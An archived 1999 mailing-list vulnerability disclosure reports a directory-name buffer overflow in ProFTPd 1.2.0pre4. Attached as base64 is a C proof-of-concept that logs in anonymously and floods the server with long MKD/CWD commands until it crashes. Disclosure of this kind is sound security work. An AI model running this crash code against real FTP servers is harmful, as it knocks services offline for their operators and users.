thr3ads.net - linux security - buffer overflow in proftpd-1.2.0pre4, supposed to be ''safe'' [Sep 1999]

If this information is useful, please help other people find it:
Share via:

Renaud Deraison

1999-Sep-04 17:08 UTC

buffer overflow in proftpd-1.2.0pre4, supposed to be ''safe''

This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.10.9909050208003.15329@prof.fr.nessus.org>




Hello,

ProFTPd, a FTP server, has been suffering several security holes lately.

However, the version 1.2.0pre4 is still vulnerable to a mkdir attack,
even though it is supposed to be patched against it.

The trick is to create directories whose name don''t exceed 255 chars.

I have not looked at this problem in detail, but I could at least make a
pointer point on a bogus location (85858585) using this method.

Attached to this mail is a C program that will make proftpd crash, but
which won''t exploit the vulnerability.


Thank you for your attention,

				-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org


---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="crash_ftpd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9909050206220.15281@prof.fr.nessus.org>
Content-Description: demo code
Content-Disposition: ATTACHMENT; FILENAME="crash_ftpd.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j
bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU
UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog
Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz
dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0
aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy
aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk
IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog
Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2
cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg
IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l
IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K
IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz
b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD
V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy
ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt
a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h
bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0
KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6
ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu
X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0
YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j
a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog
ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg
c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy
NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz
cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1
NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl
Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw
XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j
LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo
c29jLCAiUEFTUyBwYXNzQFxyXG4iLCBzdHJsZW4oIlBBU1MgcGFzc0Bcclxu
IiksMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBiemVybyhi
dWYsMTAyNCk7DQogIHNlbmQoc29jLCB3cml0ZWFibGVfZGlyLCBzdHJsZW4o
d3JpdGVhYmxlX2RpciksIDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAw
KTsNCiAgYnplcm8oYnVmLDEwMjQpOw0KICANCiAgDQogIGZvcihpPTA7aTw0
MDtpKyspDQogIHsNCiAgIHNlbmQoc29jLCBta2QsIHN0cmxlbihta2QpLCAw
KTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7DQogICBpZighc3RybGVu
KGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1vdGUgRlRQZCBjcmFzaGVk
IChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsNCiAgICBleGl0KDApOw0K
ICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAgIHNlbmQoc29jLCBjd2Qs
IHN0cmxlbihjd2QpLCAwKTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7
DQogICBpZighc3RybGVuKGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1v
dGUgRlRQZCBjcmFzaGVkIChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsN
CiAgICBleGl0KDApOw0KICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAg
fQ0KICBwcmludGYoIllvdSB3ZXJlIG5vdCB2dWxuZXJhYmxlIGFmdGVyIGFs
bC4gU29ycnlcbiIpOw0KICBjbG9zZShzb2MpOw0KIH0NCiBlbHNlIHBlcnJv
cigiY29ubmVjdCAiKTsNCiByZXR1cm4oMCk7DQp9DQogICANCiAgDQo---1463810815-1223308169-936489982=:15281--

Possibly Parallel Threads

Search for more maybe matching threads

linux security - Sep 1999 - buffer overflow in proftpd-1.2.0pre4, supposed to be ''safe''

buffer overflow in proftpd-1.2.0pre4, supposed to be ''safe''

Possibly Parallel Threads

Wisdom of the Ancients